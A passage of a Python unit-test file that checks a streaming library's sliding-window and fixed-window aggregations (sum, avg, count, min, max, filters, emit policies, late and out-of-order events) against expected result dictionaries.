SlidingWindows(['1h', '2h', '24h'], '10m'))],
Table("test", NoopDriver())),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(10):
data = {'col1': i}
controller.emit(data, f'{i % 2}', test_base_time + timedelta(minutes=i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0, 'number_of_stuff_sum_24h': 0,
'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'number_of_stuff_avg_24h': 0.0},
{'col1': 1, 'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1, 'number_of_stuff_sum_24h': 1,
'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0},
{'col1': 2, 'number_of_stuff_sum_1h': 2, 'number_of_stuff_sum_2h': 2, 'number_of_stuff_sum_24h': 2,
'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0},
{'col1': 3, 'number_of_stuff_sum_1h': 4, 'number_of_stuff_sum_2h': 4, 'number_of_stuff_sum_24h': 4,
'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 2.0, 'number_of_stuff_avg_24h': 2.0},
{'col1': 4, 'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6, 'number_of_stuff_sum_24h': 6,
'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 2.0, 'number_of_stuff_avg_24h': 2.0},
{'col1': 5, 'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 9, 'number_of_stuff_sum_24h': 9,
'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 3.0, 'number_of_stuff_avg_24h': 3.0},
{'col1': 6, 'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 12, 'number_of_stuff_sum_24h': 12,
'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 3.0, 'number_of_stuff_avg_24h': 3.0},
{'col1': 7, 'number_of_stuff_sum_1h': 16, 'number_of_stuff_sum_2h': 16, 'number_of_stuff_sum_24h': 16,
'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 4.0, 'number_of_stuff_avg_24h': 4.0},
{'col1': 8, 'number_of_stuff_sum_1h': 20, 'number_of_stuff_sum_2h': 20, 'number_of_stuff_sum_24h': 20,
'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 4.0, 'number_of_stuff_avg_24h': 4.0},
{'col1': 9, 'number_of_stuff_sum_1h': 25, 'number_of_stuff_sum_2h': 25, 'number_of_stuff_sum_24h': 25,
'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 5.0, 'number_of_stuff_avg_24h': 5.0}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_sliding_window_aggregations_with_filters_flow():
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["sum", "avg"],
SlidingWindows(['1h', '2h', '24h'], '10m'),
aggr_filter=lambda element: element['is_valid'] == 0)],
Table("test", NoopDriver())),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(10):
data = {'col1': i, 'is_valid': i % 2}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=i))
controller.terminate()
actual = controller.await_termination()
expected_results = [{'col1': 0, 'is_valid': 0, 'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0,
'number_of_stuff_sum_24h': 0, 'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0,
'number_of_stuff_avg_24h': 0.0},
{'col1': 1, 'is_valid': 1, 'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0,
'number_of_stuff_sum_24h': 0, 'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0,
'number_of_stuff_avg_24h': 0.0},
{'col1': 2, 'is_valid': 0, 'number_of_stuff_sum_1h': 2, 'number_of_stuff_sum_2h': 2,
'number_of_stuff_sum_24h': 2, 'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0,
'number_of_stuff_avg_24h': 1.0},
{'col1': 3, 'is_valid': 1, 'number_of_stuff_sum_1h': 2, 'number_of_stuff_sum_2h': 2,
'number_of_stuff_sum_24h': 2, 'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0,
'number_of_stuff_avg_24h': 1.0},
{'col1': 4, 'is_valid': 0, 'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6,
'number_of_stuff_sum_24h': 6, 'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 2.0,
'number_of_stuff_avg_24h': 2.0},
{'col1': 5, 'is_valid': 1, 'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6,
'number_of_stuff_sum_24h': 6, 'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 2.0,
'number_of_stuff_avg_24h': 2.0},
{'col1': 6, 'is_valid': 0, 'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 12,
'number_of_stuff_sum_24h': 12, 'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 3.0,
'number_of_stuff_avg_24h': 3.0},
{'col1': 7, 'is_valid': 1, 'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 12,
'number_of_stuff_sum_24h': 12, 'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 3.0,
'number_of_stuff_avg_24h': 3.0},
{'col1': 8, 'is_valid': 0, 'number_of_stuff_sum_1h': 20, 'number_of_stuff_sum_2h': 20,
'number_of_stuff_sum_24h': 20, 'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 4.0,
'number_of_stuff_avg_24h': 4.0},
{'col1': 9, 'is_valid': 1, 'number_of_stuff_sum_1h': 20, 'number_of_stuff_sum_2h': 20,
'number_of_stuff_sum_24h': 20, 'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 4.0,
'number_of_stuff_avg_24h': 4.0}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_sliding_window_aggregations_with_max_values_flow():
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator("num_hours_with_stuff_in_the_last_24h", "col1", ["count"],
SlidingWindows(['24h'], '1h'),
max_value=1)],
Table("test", NoopDriver())),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(10):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=10 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [{'col1': 0, 'num_hours_with_stuff_in_the_last_24h_count_24h': 1},
{'col1': 1, 'num_hours_with_stuff_in_the_last_24h_count_24h': 1},
{'col1': 2, 'num_hours_with_stuff_in_the_last_24h_count_24h': 1},
{'col1': 3, 'num_hours_with_stuff_in_the_last_24h_count_24h': 1},
{'col1': 4, 'num_hours_with_stuff_in_the_last_24h_count_24h': 1},
{'col1': 5, 'num_hours_with_stuff_in_the_last_24h_count_24h': 1},
{'col1': 6, 'num_hours_with_stuff_in_the_last_24h_count_24h': 2},
{'col1': 7, 'num_hours_with_stuff_in_the_last_24h_count_24h': 2},
{'col1': 8, 'num_hours_with_stuff_in_the_last_24h_count_24h': 2},
{'col1': 9, 'num_hours_with_stuff_in_the_last_24h_count_24h': 2}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_sliding_window_simple_aggregation_flow_multiple_fields():
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["sum", "avg"],
SlidingWindows(['1h', '2h', '24h'], '10m')),
FieldAggregator("number_of_things", "col2", ["count"],
SlidingWindows(['1h', '2h'], '15m')),
FieldAggregator("abc", "col3", ["sum"],
SlidingWindows(['24h'], '10m'))],
Table("test", NoopDriver())),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(10):
data = {'col1': i, 'col2': i * 1.2, 'col3': i * 2 + 4}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=i))
controller.terminate()
actual = controller.await_termination()
expected_results = [{'col1': 0, 'col2': 0.0, 'col3': 4, 'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0,
'number_of_stuff_sum_24h': 0, 'number_of_things_count_1h': 1, 'number_of_things_count_2h': 1,
'abc_sum_24h': 4, 'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'number_of_stuff_avg_24h': 0.0},
{'col1': 1, 'col2': 1.2, 'col3': 6, 'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1,
'number_of_stuff_sum_24h': 1, 'number_of_things_count_1h': 2, 'number_of_things_count_2h': 2,
'abc_sum_24h': 10, 'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5, 'number_of_stuff_avg_24h': 0.5},
{'col1': 2, 'col2': 2.4, 'col3': 8, 'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3,
'number_of_stuff_sum_24h': 3, 'number_of_things_count_1h': 3, 'number_of_things_count_2h': 3,
'abc_sum_24h': 18, 'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0},
{'col1': 3, 'col2': 3.5999999999999996, 'col3': 10, 'number_of_stuff_sum_1h': 6,
'number_of_stuff_sum_2h': 6, 'number_of_stuff_sum_24h': 6, 'number_of_things_count_1h': 4,
'number_of_things_count_2h': 4, 'abc_sum_24h': 28, 'number_of_stuff_avg_1h': 1.5, 'number_of_stuff_avg_2h': 1.5,
'number_of_stuff_avg_24h': 1.5},
{'col1': 4, 'col2': 4.8, 'col3': 12, 'number_of_stuff_sum_1h': 10, 'number_of_stuff_sum_2h': 10,
'number_of_stuff_sum_24h': 10, 'number_of_things_count_1h': 5, 'number_of_things_count_2h': 5,
'abc_sum_24h': 40, 'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 2.0, 'number_of_stuff_avg_24h': 2.0},
{'col1': 5, 'col2': 6.0, 'col3': 14, 'number_of_stuff_sum_1h': 15, 'number_of_stuff_sum_2h': 15,
'number_of_stuff_sum_24h': 15, 'number_of_things_count_1h': 6, 'number_of_things_count_2h': 6,
'abc_sum_24h': 54, 'number_of_stuff_avg_1h': 2.5, 'number_of_stuff_avg_2h': 2.5, 'number_of_stuff_avg_24h': 2.5},
{'col1': 6, 'col2': 7.199999999999999, 'col3': 16, 'number_of_stuff_sum_1h': 21,
'number_of_stuff_sum_2h': 21, 'number_of_stuff_sum_24h': 21, 'number_of_things_count_1h': 7,
'number_of_things_count_2h': 7, 'abc_sum_24h': 70, 'number_of_stuff_avg_1h': 3.0,
'number_of_stuff_avg_2h': 3.0, 'number_of_stuff_avg_24h': 3.0},
{'col1': 7, 'col2': 8.4, 'col3': 18, 'number_of_stuff_sum_1h': 28, 'number_of_stuff_sum_2h': 28,
'number_of_stuff_sum_24h': 28, 'number_of_things_count_1h': 8, 'number_of_things_count_2h': 8,
'abc_sum_24h': 88, 'number_of_stuff_avg_1h': 3.5, 'number_of_stuff_avg_2h': 3.5, 'number_of_stuff_avg_24h': 3.5},
{'col1': 8, 'col2': 9.6, 'col3': 20, 'number_of_stuff_sum_1h': 36, 'number_of_stuff_sum_2h': 36,
'number_of_stuff_sum_24h': 36, 'number_of_things_count_1h': 9, 'number_of_things_count_2h': 9,
'abc_sum_24h': 108, 'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 4.0, 'number_of_stuff_avg_24h': 4.0},
{'col1': 9, 'col2': 10.799999999999999, 'col3': 22, 'number_of_stuff_sum_1h': 45,
'number_of_stuff_sum_2h': 45, 'number_of_stuff_sum_24h': 45,
'number_of_things_count_1h': 10, 'number_of_things_count_2h': 10, 'abc_sum_24h': 130,
'number_of_stuff_avg_1h': 4.5, 'number_of_stuff_avg_2h': 4.5, 'number_of_stuff_avg_24h': 4.5}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_fixed_window_simple_aggregation_flow():
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["count"],
FixedWindows(['1h', '2h', '3h', '24h']))],
Table("test", NoopDriver())),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(10):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [{'col1': 0, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 1, 'number_of_stuff_count_3h': 1,
'number_of_stuff_count_24h': 1},
{'col1': 1, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 2, 'number_of_stuff_count_3h': 2,
'number_of_stuff_count_24h': 2},
{'col1': 2, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 3, 'number_of_stuff_count_3h': 3,
'number_of_stuff_count_24h': 3},
{'col1': 3, 'number_of_stuff_count_1h': 3, 'number_of_stuff_count_2h': 4, 'number_of_stuff_count_3h': 4,
'number_of_stuff_count_24h': 4},
{'col1': 4, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 4, 'number_of_stuff_count_3h': 5,
'number_of_stuff_count_24h': 5},
{'col1': 5, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 5, 'number_of_stuff_count_3h': 6,
'number_of_stuff_count_24h': 6},
{'col1': 6, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 3, 'number_of_stuff_count_3h': 6,
'number_of_stuff_count_24h': 7},
{'col1': 7, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 4, 'number_of_stuff_count_3h': 7,
'number_of_stuff_count_24h': 8},
{'col1': 8, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 3, 'number_of_stuff_count_3h': 5,
'number_of_stuff_count_24h': 9},
{'col1': 9, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 4, 'number_of_stuff_count_3h': 6,
'number_of_stuff_count_24h': 10}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_emit_max_event_sliding_window_multiple_keys_aggregation_flow():
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["sum", "avg"],
SlidingWindows(['1h', '2h', '24h'], '10m'))],
Table("test", NoopDriver()), emit_policy=EmitAfterMaxEvent(3)),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(12):
data = {'col1': i}
controller.emit(data, f'{i % 2}', test_base_time + timedelta(minutes=i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 4, 'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6, 'number_of_stuff_sum_24h': 6, 'number_of_stuff_avg_1h': 2.0,
'number_of_stuff_avg_2h': 2.0, 'number_of_stuff_avg_24h': 2.0},
{'col1': 5, 'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 9, 'number_of_stuff_sum_24h': 9, 'number_of_stuff_avg_1h': 3.0,
'number_of_stuff_avg_2h': 3.0, 'number_of_stuff_avg_24h': 3.0},
{'col1': 10, 'number_of_stuff_sum_1h': 30, 'number_of_stuff_sum_2h': 30, 'number_of_stuff_sum_24h': 30,
'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 5.0, 'number_of_stuff_avg_24h': 5.0},
{'col1': 11, 'number_of_stuff_sum_1h': 36, 'number_of_stuff_sum_2h': 36, 'number_of_stuff_sum_24h': 36,
'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 6.0, 'number_of_stuff_avg_24h': 6.0}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_error_on_bad_emit_policy():
try:
AggregateByKey([], Table("test", NoopDriver()), emit_policy=EmitEveryEvent),
assert False
except TypeError:
pass
def test_emit_delay_aggregation_flow():
q = queue.Queue(1)
def reduce_fn(acc, x):
if x['col1'] == 2:
q.put(None)
acc.append(x)
return acc
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["sum", "count"],
SlidingWindows(['1h'], '10m'))],
Table("test", NoopDriver()), emit_policy=EmitAfterMaxEvent(4, 1)),
Reduce([], reduce_fn),
]).run()
for i in range(11):
if i == 3:
q.get()
data = {'col1': i}
controller.emit(data, 'katya', test_base_time + timedelta(seconds=i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 2, 'number_of_stuff_sum_1h': 3, 'number_of_stuff_count_1h': 3},
{'col1': 6, 'number_of_stuff_sum_1h': 21, 'number_of_stuff_count_1h': 7},
{'col1': 10, 'number_of_stuff_sum_1h': 55, 'number_of_stuff_count_1h': 11}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_aggregate_dict_simple_aggregation_flow():
aggregations = [{'name': 'number_of_stuff',
'column': 'col1',
'operations': ["sum", "avg", "min", "max"],
'windows': ['1h', '2h', '24h'],
'period': '10m'}]
controller = build_flow([
SyncEmitSource(),
AggregateByKey(aggregations, Table("test", NoopDriver())),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(10):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0, 'number_of_stuff_sum_24h': 0, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 0, 'number_of_stuff_max_2h': 0,
'number_of_stuff_max_24h': 0, 'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'number_of_stuff_avg_24h': 0.0},
{'col1': 1, 'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1, 'number_of_stuff_sum_24h': 1, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 1, 'number_of_stuff_max_2h': 1,
'number_of_stuff_max_24h': 1, 'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5, 'number_of_stuff_avg_24h': 0.5},
{'col1': 2, 'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3, 'number_of_stuff_sum_24h': 3, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 2, 'number_of_stuff_max_2h': 2,
'number_of_stuff_max_24h': 2, 'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0},
{'col1': 3, 'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6, 'number_of_stuff_sum_24h': 6, 'number_of_stuff_min_1h': 1,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 3, 'number_of_stuff_max_2h': 3,
'number_of_stuff_max_24h': 3, 'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5, 'number_of_stuff_avg_24h': 1.5},
{'col1': 4, 'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 10, 'number_of_stuff_sum_24h': 10, 'number_of_stuff_min_1h': 2,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 4, 'number_of_stuff_max_2h': 4,
'number_of_stuff_max_24h': 4, 'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 2.0, 'number_of_stuff_avg_24h': 2.0},
{'col1': 5, 'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 15, 'number_of_stuff_sum_24h': 15, 'number_of_stuff_min_1h': 3,
'number_of_stuff_min_2h': 1, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 5, 'number_of_stuff_max_2h': 5,
'number_of_stuff_max_24h': 5, 'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 3.0, 'number_of_stuff_avg_24h': 2.5},
{'col1': 6, 'number_of_stuff_sum_1h': 15, 'number_of_stuff_sum_2h': 20, 'number_of_stuff_sum_24h': 21, 'number_of_stuff_min_1h': 4,
'number_of_stuff_min_2h': 2, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 6, 'number_of_stuff_max_2h': 6,
'number_of_stuff_max_24h': 6, 'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 4.0, 'number_of_stuff_avg_24h': 3.0},
{'col1': 7, 'number_of_stuff_sum_1h': 18, 'number_of_stuff_sum_2h': 25, 'number_of_stuff_sum_24h': 28, 'number_of_stuff_min_1h': 5,
'number_of_stuff_min_2h': 3, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 7, 'number_of_stuff_max_2h': 7,
'number_of_stuff_max_24h': 7, 'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 5.0, 'number_of_stuff_avg_24h': 3.5},
{'col1': 8, 'number_of_stuff_sum_1h': 21, 'number_of_stuff_sum_2h': 30, 'number_of_stuff_sum_24h': 36, 'number_of_stuff_min_1h': 6,
'number_of_stuff_min_2h': 4, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 8, 'number_of_stuff_max_2h': 8,
'number_of_stuff_max_24h': 8, 'number_of_stuff_avg_1h': 7.0, 'number_of_stuff_avg_2h': 6.0, 'number_of_stuff_avg_24h': 4.0},
{'col1': 9, 'number_of_stuff_sum_1h': 24, 'number_of_stuff_sum_2h': 35, 'number_of_stuff_sum_24h': 45, 'number_of_stuff_min_1h': 7,
'number_of_stuff_min_2h': 5, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 9, 'number_of_stuff_max_2h': 9,
'number_of_stuff_max_24h': 9, 'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0, 'number_of_stuff_avg_24h': 4.5}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_aggregate_dict_fixed_window():
aggregations = [{'name': 'number_of_stuff',
'column': 'col1',
'operations': ["count"],
'windows': ['1h', '2h', '3h', '24h']}]
controller = build_flow([
SyncEmitSource(),
AggregateByKey(aggregations, Table("test", NoopDriver())),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(10):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [{'col1': 0, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 1, 'number_of_stuff_count_3h': 1,
'number_of_stuff_count_24h': 1},
{'col1': 1, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 2, 'number_of_stuff_count_3h': 2,
'number_of_stuff_count_24h': 2},
{'col1': 2, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 3, 'number_of_stuff_count_3h': 3,
'number_of_stuff_count_24h': 3},
{'col1': 3, 'number_of_stuff_count_1h': 3, 'number_of_stuff_count_2h': 4, 'number_of_stuff_count_3h': 4,
'number_of_stuff_count_24h': 4},
{'col1': 4, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 4, 'number_of_stuff_count_3h': 5,
'number_of_stuff_count_24h': 5},
{'col1': 5, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 5, 'number_of_stuff_count_3h': 6,
'number_of_stuff_count_24h': 6},
{'col1': 6, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 3, 'number_of_stuff_count_3h': 6,
'number_of_stuff_count_24h': 7},
{'col1': 7, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 4, 'number_of_stuff_count_3h': 7,
'number_of_stuff_count_24h': 8},
{'col1': 8, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 3, 'number_of_stuff_count_3h': 5,
'number_of_stuff_count_24h': 9},
{'col1': 9, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 4, 'number_of_stuff_count_3h': 6,
'number_of_stuff_count_24h': 10}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_sliding_window_old_event():
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["sum", "avg", "min", "max"],
SlidingWindows(['1h', '2h', '24h'], '10m'))],
Table("test", NoopDriver())),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(3):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.emit({'col1': 3}, 'tal', test_base_time - timedelta(hours=25))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0, 'number_of_stuff_sum_24h': 0, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 0, 'number_of_stuff_max_2h': 0,
'number_of_stuff_max_24h': 0, 'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'number_of_stuff_avg_24h': 0.0},
{'col1': 1, 'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1, 'number_of_stuff_sum_24h': 1, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 1, 'number_of_stuff_max_2h': 1,
'number_of_stuff_max_24h': 1, 'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5, 'number_of_stuff_avg_24h': 0.5},
{'col1': 2, 'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3, 'number_of_stuff_sum_24h': 3, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 2, 'number_of_stuff_max_2h': 2,
'number_of_stuff_max_24h': 2, 'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0},
{'col1': 3}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_fixed_window_old_event():
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["count"],
FixedWindows(['1h', '2h', '3h', '24h']))],
Table("test", NoopDriver())),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(3):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.emit({'col1': 3}, 'tal', test_base_time - timedelta(hours=25))
controller.terminate()
actual = controller.await_termination()
expected_results = [{'col1': 0, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 1, 'number_of_stuff_count_3h': 1,
'number_of_stuff_count_24h': 1},
{'col1': 1, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 2, 'number_of_stuff_count_3h': 2,
'number_of_stuff_count_24h': 2},
{'col1': 2, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 3, 'number_of_stuff_count_3h': 3,
'number_of_stuff_count_24h': 3},
{'col1': 3}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_fixed_window_out_of_order_event():
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["count"],
FixedWindows(['1h', '2h']))],
Table("test", NoopDriver())),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(3):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.emit({'col1': 3}, 'tal', test_base_time + timedelta(minutes=15))
controller.emit({'col1': 4}, 'tal', test_base_time + timedelta(minutes=25 * 3))
controller.terminate()
actual = controller.await_termination()
expected_results = [{'col1': 0, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 1},
{'col1': 1, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 2},
{'col1': 2, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 3},
{'col1': 3, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 2},
{'col1': 4, 'number_of_stuff_count_1h': 3, 'number_of_stuff_count_2h': 5}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_fixed_window_roll_cached_buckets():
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["count"],
FixedWindows(['1h', '2h', '3h']))],
Table("test", NoopDriver())),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(10):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [{'col1': 0, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 1, 'number_of_stuff_count_3h': 1},
{'col1': 1, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 2, 'number_of_stuff_count_3h': 2},
{'col1': 2, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 3, 'number_of_stuff_count_3h': 3},
